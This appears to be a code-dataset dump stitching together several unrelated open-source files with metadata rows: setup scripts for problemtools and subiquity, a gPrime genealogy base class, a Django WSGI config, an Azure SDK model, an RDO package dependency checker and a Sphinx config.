'ERROR_INVALID_HANDLE': 'STATUS_INVALID_HANDLE',
'ERROR_INVALID_PARAMETER': 'STATUS_INVALID_PARAMETER',
'ERROR_INVALID_USER_BUFFER': 'STATUS_INVALID_USER_BUFFER',
'ERROR_LOGON_FAILURE': 'STATUS_LOGON_FAILURE',
'ERROR_MEDIA_CHANGED': 'STATUS_MEDIA_CHANGED',
'ERROR_NOT_LOCKED': 'STATUS_NOT_LOCKED',
'ERROR_NOT_SUPPORTED': 'STATUS_NOT_SUPPORTED',
'ERROR_NO_LOGON_SERVERS': 'STATUS_NO_LOGON_SERVERS',
'ERROR_NO_SUCH_LOGON_SESSION': 'STATUS_NO_SUCH_LOGON_SESSION',
'ERROR_NO_SUCH_PACKAGE': 'STATUS_NO_SUCH_PACKAGE',
'ERROR_NO_USER_SESSION_KEY': 'STATUS_NO_USER_SESSION_KEY',
'ERROR_PASSWORD_EXPIRED': 'STATUS_PASSWORD_EXPIRED',
'ERROR_PIPE_BUSY': 'STATUS_PIPE_BUSY',
'ERROR_STACK_OVERFLOW': 'STATUS_STACK_OVERFLOW',
'ERROR_TOO_MANY_NAMES': 'STATUS_TOO_MANY_NAMES',
'ERROR_TRUST_FAILURE': 'STATUS_TRUST_FAILURE',
'ERROR_ACCESS_DISABLED_BY_POLICY': 'STATUS_ACCESS_DISABLED_BY_POLICY_OTHER',
'ERROR_BAD_EXE_FORMAT': 'STATUS_INVALID_IMAGE_FORMAT',
'ERROR_BAD_NETPATH': 'STATUS_BAD_NETWORK_PATH',
'ERROR_BAD_PATHNAME': 'STATUS_OBJECT_PATH_INVALID',
'ERROR_BAD_PIPE': 'STATUS_INVALID_PIPE_STATE',
'ERROR_CRC': 'STATUS_CRC_ERROR',
'ERROR_DEV_NOT_EXIST': 'STATUS_DEVICE_DOES_NOT_EXIST',
'ERROR_DUP_NAME': 'STATUS_DUPLICATE_NAME',
'ERROR_FILE_CORRUPT': 'STATUS_FILE_CORRUPT_ERROR',
'ERROR_FILE_NOT_FOUND': 'STATUS_OBJECT_NAME_NOT_FOUND',
'ERROR_HANDLE_EOF': 'STATUS_END_OF_FILE',
'ERROR_INSUFFICIENT_BUFFER': 'STATUS_BUFFER_TOO_SMALL',
'ERROR_INVALID_ADDRESS': 'STATUS_MEMORY_NOT_ALLOCATED',
'ERROR_INVALID_FUNCTION': 'STATUS_NOT_IMPLEMENTED',
'ERROR_INVALID_NETNAME': 'STATUS_INVALID_ADDRESS_COMPONENT',
'ERROR_INVALID_ORDINAL': 'STATUS_ORDINAL_NOT_FOUND',
'ERROR_INVALID_PASSWORD': 'STATUS_WRONG_PASSWORD',
'ERROR_IO_DEVICE': 'STATUS_IO_DEVICE_ERROR',
'ERROR_LOCK_VIOLATION': 'STATUS_LOCK_NOT_GRANTED',
'ERROR_MORE_DATA': 'STATUS_BUFFER_OVERFLOW',
'ERROR_MUTUAL_AUTH_FAILED': 'STATUS_MUTUAL_AUTHENTICATION_FAILED',
'ERROR_NETNAME_DELETED': 'STATUS_NETWORK_NAME_DELETED',
'ERROR_NOACCESS': 'STATUS_ACCESS_VIOLATION',
'ERROR_NOT_ENOUGH_MEMORY': 'STATUS_NO_MEMORY',
'ERROR_NOT_OWNER': 'STATUS_RESOURCE_NOT_OWNED',
'ERROR_NOT_READY': 'STATUS_DEVICE_NOT_READY',
'ERROR_NO_DATA': 'STATUS_PIPE_EMPTY',
'ERROR_NO_MORE_ITEMS': 'STATUS_NO_MORE_ENTRIES',
'ERROR_NO_SYSTEM_RESOURCES': 'STATUS_INSUFFICIENT_RESOURCES',
'ERROR_PATH_NOT_FOUND': 'STATUS_OBJECT_PATH_NOT_FOUND',
'ERROR_PROC_NOT_FOUND': 'STATUS_PROCEDURE_NOT_FOUND',
'ERROR_REM_NOT_LIST': 'STATUS_REMOTE_NOT_LISTENING',
'ERROR_SERVICE_ALREADY_RUNNING': 'STATUS_IMAGE_ALREADY_LOADED',
'ERROR_UNEXP_NET_ERR': 'STATUS_UNEXPECTED_NETWORK_ERROR',
'ERROR_WRITE_PROTECT': 'STATUS_MEDIA_WRITE_PROTECTED',
}
errmap = {}
for pair in pairs:
if not pair[1] in fixed:
assert pair[1] not in errmap
errmap[pair[1]] = pair[0]
errmap.update(fixed)
if "FspNtStatusFromWin32" == sys.argv[1]:
for w, s in sorted(errmap.items()):
print "case %-40s return %s;" % (w + ':', s)
elif "FspWin32FromNtStatus" == sys.argv[1]:
for s, w in sorted(pairs):
print "case %-40s return %s;" % (s + ':', w)
|
gpl-3.0
| -1,532,350,312,026,019,800 | 45.833333 | 80 | 0.678953 | false |
godmar/problemtools
|
setup.py
|
1
|
2718
|
#!/usr/bin/env python2
from setuptools import setup, find_packages
from setuptools.command.bdist_egg import bdist_egg as _bdist_egg
import distutils.cmd
from distutils.command.build import build as _build
import os
import subprocess
class BuildSupport(distutils.cmd.Command):
"""A custom command to build the support programs."""
description = 'build the problemtools support programs'
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
"""Run command."""
# FIXME this seems very fragile...
dest = os.path.join(os.path.realpath(self.distribution.command_obj['build'].build_lib),
'problemtools', 'support')
command = ['make', '-C', 'support', 'install', 'DESTDIR=%s' % dest]
self.announce('Running command: %s' % ' '.join(command), level=distutils.log.INFO)
subprocess.check_call(command)
class bdist_egg(_bdist_egg):
"""Updated bdist_egg command that also builds support."""
def run(self):
self.run_command('build_support')
_bdist_egg.run(self)
class build(_build):
"""Updated build command that also builds support."""
def run(self):
self.run_command('build_support')
_build.run(self)
def get_version():
base_dir = os.path.dirname(__file__)
__version__ = None
try:
update_script = os.path.join(base_dir, 'admin', 'update_version.py.sh')
__version__ = subprocess.check_output([update_script])
except:
pass
if __version__ is None:
version_file = os.path.join(base_dir, 'problemtools', '_version.py')
with open(version_file, 'r') as version_in:
exec(version_in.read())
return __version__
setup(name='problemtools',
version=get_version(),
description='Kattis Problem Tools',
maintainer='Per Austrin',
maintainer_email='austrin@kattis.com',
url='https://github.com/Kattis/problemtools',
license='MIT',
packages=find_packages(),
entry_points = {
'console_scripts': [
'verifyproblem=problemtools.verifyproblem:main',
'problem2html=problemtools.problem2html:main',
'problem2pdf=problemtools.problem2pdf:main',
]
},
include_package_data=True,
install_requires=[
'PyYAML',
'plasTeX',
],
# Temporarily disabled, see setup.cfg
# For now tests can be run manually with pytest
# setup_requires=['pytest-runner'],
# tests_require=['pytest'],
cmdclass={
'build_support': BuildSupport,
'bdist_egg': bdist_egg,
'build': build
},
)
|
mit
| -8,236,077,664,496,998,000 | 27.610526 | 95 | 0.611111 | false |
CanonicalLtd/subiquity
|
setup.py
|
1
|
3933
|
#!/usr/bin/env python3
# -*- mode: python; -*-
#
# Copyright 2015 Canonical, Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This package is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
subiquity
=========
Ubuntu Server Installer
"""
import distutils.cmd
import distutils.command.build
import distutils.spawn
import glob
import os
import sys
from setuptools import setup, find_packages
class build_i18n(distutils.cmd.Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
data_files = self.distribution.data_files
with open('po/POTFILES.in') as in_fp:
with open('po/POTFILES.in.tmp', 'w') as out_fp:
for line in in_fp:
if line.startswith('['):
continue
out_fp.write('../' + line)
os.chdir('po')
distutils.spawn.spawn([
'xgettext',
'--directory=.',
'--add-comments',
'--from-code=UTF-8',
'--keyword=pgettext:1c,2',
'--output=subiquity.pot',
'--files-from=POTFILES.in.tmp',
])
os.chdir('..')
os.unlink('po/POTFILES.in.tmp')
for po_file in glob.glob("po/*.po"):
lang = os.path.basename(po_file[:-3])
mo_dir = os.path.join("build", "mo", lang, "LC_MESSAGES")
mo_file = os.path.join(mo_dir, "subiquity.mo")
if not os.path.exists(mo_dir):
os.makedirs(mo_dir)
distutils.spawn.spawn(["msgfmt", po_file, "-o", mo_file])
targetpath = os.path.join("share/locale", lang, "LC_MESSAGES")
data_files.append((targetpath, (mo_file,)))
class build(distutils.command.build.build):
sub_commands = distutils.command.build.build.sub_commands + [
("build_i18n", None)]
with open(os.path.join(os.path.dirname(__file__),
'subiquitycore', '__init__.py')) as init:
lines = [line for line in init if 'i18n' not in line]
ns = {}
exec('\n'.join(lines), ns)
version = ns['__version__']
if sys.argv[-1] == 'clean':
print("Cleaning up ...")
os.system('rm -rf subiquity.egg-info build dist')
sys.exit()
setup(name='subiquity',
version=version,
description="Ubuntu Server Installer",
long_description=__doc__,
author='Canonical Engineering',
author_email='ubuntu-dev@lists.ubuntu.com',
url='https://github.com/CanonicalLtd/subiquity',
license="AGPLv3+",
packages=find_packages(exclude=["tests"]),
scripts=[
'bin/console-conf-wait',
'bin/console-conf-wrapper',
'bin/subiquity-debug',
'bin/subiquity-configure-apt',
'bin/subiquity-configure-run',
'bin/subiquity-loadkeys',
'bin/subiquity-service',
],
entry_points={
'console_scripts': [
'subiquity-server = subiquity.cmd.server:main',
'subiquity-tui = subiquity.cmd.tui:main',
'console-conf-tui = console_conf.cmd.tui:main',
('console-conf-write-login-details = '
'console_conf.cmd.write_login_details:main'),
],
},
data_files=[],
cmdclass={
'build': build,
'build_i18n': build_i18n,
},
)
|
agpl-3.0
| 8,198,292,872,499,578,000 | 29.253846 | 74 | 0.580219 | false |
sam-m888/gprime
|
gprime/lib/primaryobj.py
|
1
|
12459
|
#
# gPrime - A web-based genealogy program
#
# Copyright (C) 2000-2007 Donald N. Allingham
# Copyright (C) 2011 Tim G L Lyons
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
"""
Basic Primary Object class for Gramps.
"""
#-------------------------------------------------------------------------
#
# Standard Python modules
#
#-------------------------------------------------------------------------
from abc import abstractmethod
#-------------------------------------------------------------------------
#
# Gprime modules
#
#-------------------------------------------------------------------------
from .tableobj import TableObject
from .privacybase import PrivacyBase
from .citationbase import CitationBase
from .mediabase import MediaBase
from .tagbase import TagBase
#-------------------------------------------------------------------------
#
# Basic Primary Object class
#
#-------------------------------------------------------------------------
class BasicPrimaryObject(TableObject, PrivacyBase, TagBase):
"""
The BasicPrimaryObject is the base class for :class:`~.note.Note` objects.
It is also the base class for the :class:`PrimaryObject` class.
The :class:`PrimaryObject` is the base class for all other primary objects
in the database. Primary objects are the core objects in the database.
Each object has a database handle and a ID value. The database
handle is used as the record number for the database, and the Gramps
ID is the user visible version.
"""
def __init__(self, source=None):
"""
Initialize a PrimaryObject.
If source is None, both the ID and handle are assigned as empty
strings. If source is not None, then object is initialized from values
of the source object.
:param source: Object used to initialize the new object
:type source: PrimaryObject
"""
TableObject.__init__(self, source)
PrivacyBase.__init__(self, source)
TagBase.__init__(self)
if source:
self.gid = source.gid
else:
self.gid = None
@abstractmethod
def to_struct(self):
"""
Convert the data held in this object to a structure (eg,
struct) that represents all the data elements.
This method is used to recursively convert the object into a
self-documenting form that can easily be used for various
purposes, including diffs and queries.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns a struct containing the data of the object.
"""
@abstractmethod
def from_struct(self, struct):
"""
Given a struct data representation, return an object of this type.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns an object of this type.
"""
def set_gid(self, gid):
"""
Set the ID for the primary object.
:param gid: ID
:type gid: str
"""
self.gid = gid
def get_gid(self):
"""
Return the ID for the primary object.
:returns: ID associated with the object
:rtype: str
"""
return self.gid
def has_handle_reference(self, classname, handle):
"""
Return True if the object has reference to a given handle of given
primary object type.
:param classname: The name of the primary object class.
:type classname: str
:param handle: The handle to be checked.
:type handle: str
:returns:
Returns whether the object has reference to this handle of
this object type.
:rtype: bool
"""
return False
def remove_handle_references(self, classname, handle_list):
"""
Remove all references in this object to object handles in the list.
:param classname: The name of the primary object class.
:type classname: str
:param handle_list: The list of handles to be removed.
:type handle_list: str
"""
pass
def replace_handle_reference(self, classname, old_handle, new_handle):
"""
Replace all references to old handle with those to the new handle.
:param classname: The name of the primary object class.
:type classname: str
:param old_handle: The handle to be replaced.
:type old_handle: str
:param new_handle: The handle to replace the old one with.
:type new_handle: str
"""
pass
def has_citation_reference(self, handle):
"""
Indicate if the object has a citation references.
In the base class, no such references exist. Derived classes should
override this if they provide citation references.
"""
return False
def has_media_reference(self, handle):
"""
Indicate if the object has a media references.
In the base class, no such references exist. Derived classes should
override this if they provide media references.
"""
return False
def replace_citation_references(self, old_handle, new_handle):
"""
Replace all references to the old citation handle with those to the new
citation handle.
"""
pass
def replace_media_references(self, old_handle, new_handle):
"""
Replace all references to the old media handle with those to the new
media handle.
"""
pass
#-------------------------------------------------------------------------
#
# Primary Object class
#
#-------------------------------------------------------------------------
class PrimaryObject(BasicPrimaryObject):
"""
The PrimaryObject is the base class for all primary objects in the
database.
Primary objects are the core objects in the database.
Each object has a database handle and a ID value. The database
handle is used as the record number for the database, and the Gramps
ID is the user visible version.
"""
def __init__(self, source=None):
"""
Initialize a PrimaryObject.
If source is None, both the ID and handle are assigned as empty
strings. If source is not None, then object is initialized from values
of the source object.
:param source: Object used to initialize the new object
:type source: PrimaryObject
"""
BasicPrimaryObject.__init__(self, source)
@abstractmethod
def to_struct(self):
"""
Convert the data held in this object to a structure (eg,
struct) that represents all the data elements.
This method is used to recursively convert the object into a
self-documenting form that can easily be used for various
purposes, including diffs and queries.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns a struct containing the data of the object.
"""
@abstractmethod
def from_struct(self, struct):
"""
Given a struct data representation, return an object of this type.
These structures may be primitive Python types (string,
integer, boolean, etc.) or complex Python types (lists,
tuples, or dicts). If the return type is a dict, then the keys
of the dict match the fieldname of the object. If the return
struct (or value of a dict key) is a list, then it is a list
of structs. Otherwise, the struct is just the value of the
attribute.
:returns: Returns an object of this type.
"""
def has_handle_reference(self, classname, handle):
"""
Return True if the object has reference to a given handle of given
primary object type.
:param classname: The name of the primary object class.
:type classname: str
:param handle: The handle to be checked.
:type handle: str
:returns: Returns whether the object has reference to this handle
of this object type.
:rtype: bool
"""
if classname == 'Citation' and isinstance(self, CitationBase):
return self.has_citation_reference(handle)
elif classname == 'Media' and isinstance(self, MediaBase):
return self.has_media_reference(handle)
else:
return self._has_handle_reference(classname, handle)
def remove_event_references(self, handle_list):
new_list = [ref for ref in self.event_ref_list
if ref.ref not in handle_list]
self.event_ref_list = new_list
def remove_media_references(self, handle_list):
self.media_list = [ref for ref in self.media_list
if ref.ref not in handle_list]
def remove_tag_references(self, handle_list):
self.tag_list = [handle for handle in self.tag_list
if handle not in handle_list]
def remove_note_references(self, handle_list):
self.note_list = [handle for handle in self.note_list
if handle not in handle_list]
def remove_citation_references(self, handle_list):
self.citation_list = [handle for handle in self.citation_list
if handle not in handle_list]
def remove_place_references(self, handle_list):
self.placeref_list = [ref for ref in self.placeref_list
if ref.ref not in handle_list]
def replace_handle_reference(self, classname, old_handle, new_handle):
"""
Replace all references to old handle with those to the new handle.
:param classname: The name of the primary object class.
:type classname: str
:param old_handle: The handle to be replaced.
:type old_handle: str
:param new_handle: The handle to replace the old one with.
:type new_handle: str
"""
if classname == 'Citation' and isinstance(self, CitationBase):
self.replace_citation_references(old_handle, new_handle)
elif classname == 'Media' and isinstance(self, MediaBase):
self.replace_media_references(old_handle, new_handle)
else:
self._replace_handle_reference(classname, old_handle, new_handle)
def _has_handle_reference(self, classname, handle):
"""
Return True if the handle is referenced by the object.
"""
return False
def _replace_handle_reference(self, classname, old_handle, new_handle):
"""
Replace the handle reference with the new reference.
"""
pass
|
gpl-2.0
| -4,829,788,241,042,503,000 | 34.69914 | 79 | 0.609278 | false |
aroth-arsoft/arsoft-web-filewatch
|
arsoft/web/filewatch/wsgi.py
|
1
|
1283
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;
"""
WSGI config for arsoft.web.filewatch project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "arsoft.web.filewatch.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
|
gpl-3.0
| -7,853,104,654,603,299,000 | 39.09375 | 80 | 0.788776 | false |
lmazuel/azure-sdk-for-python
|
azure-mgmt-compute/azure/mgmt/compute/v2016_04_30_preview/models/win_rm_listener.py
|
1
|
1843
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class WinRMListener(Model):
"""Describes Protocol and thumbprint of Windows Remote Management listener.
:param protocol: Specifies the protocol of listener. <br><br> Possible
values are: <br>**http** <br><br> **https**. Possible values include:
'Http', 'Https'
:type protocol: str or
~azure.mgmt.compute.v2016_04_30_preview.models.ProtocolTypes
:param certificate_url: This is the URL of a certificate that has been
uploaded to Key Vault as a secret. For adding a secret to the Key Vault,
see [Add a key or secret to the key
vault](https://docs.microsoft.com/azure/key-vault/key-vault-get-started/#add).
In this case, your certificate needs to be It is the Base64 encoding of
the following JSON Object which is encoded in UTF-8: <br><br> {<br>
"data":"<Base64-encoded-certificate>",<br> "dataType":"pfx",<br>
"password":"<pfx-file-password>"<br>}
:type certificate_url: str
"""
_attribute_map = {
'protocol': {'key': 'protocol', 'type': 'ProtocolTypes'},
'certificate_url': {'key': 'certificateUrl', 'type': 'str'},
}
def __init__(self, **kwargs):
super(WinRMListener, self).__init__(**kwargs)
self.protocol = kwargs.get('protocol', None)
self.certificate_url = kwargs.get('certificate_url', None)
|
mit
| 5,345,644,278,437,206,000 | 42.880952 | 83 | 0.622897 | false |
mscook/nway-dbify
|
nway-dbify/parse.py
|
1
|
1080
|
# Copyright 2013 Mitchell Stanton-Cook Licensed under the
# Educational Community License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may
# obtain a copy of the License at
#
# http://www.osedu.org/licenses/ECL-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing
# permissions and limitations under the License.
import sys
def parse_nway(file_path):
"""
Reference, position, type, base (N), evidence (N), annotations (N)
"""
with open(file_path) as fin:
strains = get_strains(fin.readline())
for line in fin:
print len(line.split('\t'))
def get_strains(line):
"""
Returns a list of strain IDs
"""
number_of_strains = (len(line.split('\t')[4:])-1)/3
return line.split('\t')[4:(4+number_of_strains)]
|
apache-2.0
| -5,660,395,515,860,145,000 | 33.83871 | 73 | 0.662963 | false |
rdo-infra/releng
|
rdoutils/cmd/check_dependants.py
|
1
|
10118
|
#! /usr/bin/python3
#
# Mostly copied code from find_unblocked_orphans.py in fedora
#
# Credits to original authors:
# Jesse Keating <jkeating@redhat.com>
# Till Maas <opensource@till.name>
#
# Copyright (c) 2009-2013 Red Hat
# SPDX-License-Identifier: GPL-2.0
#
# From:
# https://pagure.io/releng/blob/main/f/scripts/find_unblocked_orphans.py
from collections import OrderedDict
import argparse
import os
import sys
import dnf
def get_repos(release):
RDO_TRUNK_C8 = {
"rdo-baremetal": "http://trunk.rdoproject.org/centos8-%s/component/baremetal/current" % release, # noqa
"rdo-cinder": "http://trunk.rdoproject.org/centos8-%s/component/cinder/current" % release, # noqa
"rdo-clients": "http://trunk.rdoproject.org/centos8-%s/component/clients/current" % release, # noqa
"rdo-cloudops": "http://trunk.rdoproject.org/centos8-%s/component/cloudops/current" % release, # noqa
"rdo-common": "http://trunk.rdoproject.org/centos8-%s/component/common/current" % release, # noqa
"rdo-compute": "http://trunk.rdoproject.org/centos8-%s/component/compute/current" % release, # noqa
"rdo-glance": "http://trunk.rdoproject.org/centos8-%s/component/glance/current" % release, # noqa
"rdo-manila": "http://trunk.rdoproject.org/centos8-%s/component/manila/current" % release, # noqa
"rdo-network": "http://trunk.rdoproject.org/centos8-%s/component/network/current" % release, # noqa
"rdo-octavia": "http://trunk.rdoproject.org/centos8-%s/component/octavia/current" % release, # noqa
"rdo-security": "http://trunk.rdoproject.org/centos8-%s/component/security/current" % release, # noqa
"rdo-swift": "http://trunk.rdoproject.org/centos8-%s/component/swift/current" % release, # noqa
"rdo-tempest": "http://trunk.rdoproject.org/centos8-%s/component/tempest/current" % release, # noqa
"rdo-tripleo": "http://trunk.rdoproject.org/centos8-%s/component/tripleo/current" % release, # noqa
"rdo-ui": "http://trunk.rdoproject.org/centos8-%s/component/ui/current" % release, # noqa
"rdo-component": "http://trunk.rdoproject.org/centos8-%s/component/validation/current" % release, # noqa
"deps": "http://trunk.rdoproject.org/centos8-%s/deps/latest" % release, # noqa
"build-deps": "http://trunk.rdoproject.org/centos8-%s/build-deps/latest" % release, # noqa
"deps-srpm": "http://trunk.rdoproject.org/centos8-%s/deps/latest/SRPMS" % release, # noqa
"build-srpm": "http://trunk.rdoproject.org/centos8-%s/build-deps/latest/SRPMS" % release, # noqa
"baseos": "http://mirror.centos.org/centos/8-stream/BaseOS/x86_64/os/", # noqa
"appstream": "http://mirror.centos.org/centos/8-stream/AppStream/x86_64/os/", # noqa
"baseos-srpm": "https://vault.centos.org/centos/8-stream/BaseOS/Source/", # noqa
"appstream-srpm": "https://vault.centos.org/centos/8-stream/AppStream/Source/", # noqa
}
releases = {
"master": RDO_TRUNK_C8,
"wallaby": RDO_TRUNK_C8,
"victoria": RDO_TRUNK_C8,
"ussuri": RDO_TRUNK_C8,
"train": RDO_TRUNK_C8,
}
return releases[release]
def eprint(*args, **kwargs):
kwargs.setdefault('file', sys.stderr)
kwargs.setdefault('flush', True)
print(*args, **kwargs)
def setup_dnf(release="wallaby"):
""" Setup dnf query with two repos
"""
repos = get_repos(release)
base = dnf.Base()
# use digest to make repo id unique for each URL
conf = base.conf
for name in repos.keys():
r = base.repos.add_new_repo(
("repo-%s" % name),
conf,
baseurl=[repos[name]],
skip_if_unavailable=False,
gpgcheck=0,
)
r.enable()
r.load()
base.fill_sack(load_system_repo=False, load_available_repos=True)
return base.sack.query()
class DepChecker:
def __init__(self, release, repo=None, source_repo=None, namespace='rpms'):
self._src_by_bin = None
self._bin_by_src = None
self.release = release
dnfquery = setup_dnf(release=release)
self.dnfquery = dnfquery
self.pagure_dict = {}
self.not_in_repo = []
def create_mapping(self):
src_by_bin = {} # Dict of source pkg objects by binary package objects
bin_by_src = {} # Dict of binary pkgobjects by srpm name
# Populate the dicts
for rpm_package in self.dnfquery:
if rpm_package.arch == 'src':
continue
srpm = self.SRPM(rpm_package)
src_by_bin[rpm_package] = srpm
if srpm:
if srpm.name in bin_by_src:
bin_by_src[srpm.name].append(rpm_package)
else:
bin_by_src[srpm.name] = [rpm_package]
self._src_by_bin = src_by_bin
self._bin_by_src = bin_by_src
@property
def by_src(self):
if not self._bin_by_src:
self.create_mapping()
return self._bin_by_src
@property
def by_bin(self):
if not self._src_by_bin:
self.create_mapping()
return self._src_by_bin
def find_dependent_packages(self, srpmname, ignore):
""" Return packages depending on packages built from SRPM ``srpmname``
that are built from different SRPMS not specified in ``ignore``.
:param ignore: list of binary package names that will not be
returned as dependent packages or considered as alternate
providers
:type ignore: list() of str()
:returns: OrderedDict dependent_package: list of requires only
provided by package ``srpmname`` {dep_pkg: [prov, ...]}
"""
# Some of this code was stolen from repoquery
dependent_packages = {}
# Handle packags not found in the repo
try:
rpms = self.by_src[srpmname]
except KeyError:
# If we don't have a package in the repo, there is nothing to do
eprint(f"Package {srpmname} not found in repo")
self.not_in_repo.append(srpmname)
rpms = []
# provides of all packages built from ``srpmname``
provides = []
for pkg in rpms:
# add all the provides from the package as strings
string_provides = [str(prov) for prov in pkg.provides]
provides.extend(string_provides)
# add all files as provides
# pkg.files is a list of paths
# sometimes paths start with "//" instead of "/"
# normalise "//" to "/":
# os.path.normpath("//") == "//", but
# os.path.normpath("///") == "/"
file_provides = [os.path.normpath(f'//{fn}') for fn in pkg.files]
provides.extend(file_provides)
# Zip through the provides and find what's needed
for prov in provides:
# check only base provide, ignore specific versions
# "foo = 1.fc20" -> "foo"
base_provide, *_ = prov.split()
# FIXME: Workaround for:
# https://bugzilla.redhat.com/show_bug.cgi?id=1191178
if base_provide[0] == "/":
base_provide = base_provide.replace("[", "?")
base_provide = base_provide.replace("]", "?")
# Elide provide if also provided by another package
for pkg in self.dnfquery.filter(provides=base_provide, latest=1):
# FIXME: might miss broken dependencies in case the other
# provider depends on a to-be-removed package as well
if pkg.name in ignore:
# eprint(f"Ignoring provider package {pkg.name}")
pass
elif pkg not in rpms:
break
else:
for dependent_pkg in self.dnfquery.filter(
latest=1,
requires=base_provide):
# skip if the dependent rpm package belongs to the
# to-be-removed Fedora package
if dependent_pkg in self.by_src[srpmname]:
continue
# skip if the dependent rpm package is also a
# package that should be removed
if dependent_pkg.name in ignore:
continue
# use setdefault to either create an entry for the
# dependent package or add the required prov
dependent_packages.setdefault(dependent_pkg, set()).add(
prov)
return OrderedDict(sorted(dependent_packages.items()))
# This function was stolen from pungi
def SRPM(self, package):
"""Given a package object, get a package object for the
corresponding source rpm. Requires dnf still configured
and a valid package object."""
srpm, *_ = package.sourcerpm.split('.src.rpm')
sname, sver, srel = srpm.rsplit('-', 2)
return srpm_nvr_object(self.dnfquery, sname, sver, srel)
def srpm_nvr_object(query, name, version, release):
try:
srpmpo = query.filter(name=name,
version=version,
release=release,
latest=1,
arch='src').run()[0]
return srpmpo
except IndexError:
pass
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--release",
choices=["master", "wallaby", "victoria", "ussuri",
"train"],
default="master")
parser.add_argument("--pkg-name")
args = parser.parse_args()
eprint('Getting dependants for %s' % args.pkg_name)
depchecker = DepChecker(args.release)
dependants = depchecker.find_dependent_packages(args.pkg_name, [])
for dep in dependants:
print(dep.name + "-" + dep.evr + "." + dep.arch +
" from " + str(dep.reponame))
|
apache-2.0
| -6,268,966,650,308,080,000 | 39.472 | 112 | 0.579957 | false |
dhellmann/openstack-release-test
|
doc/source/conf.py
|
1
|
2460
|
# -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
#'sphinx.ext.intersphinx',
'oslosphinx'
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'release-test'
copyright = u'2013, OpenStack Foundation'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
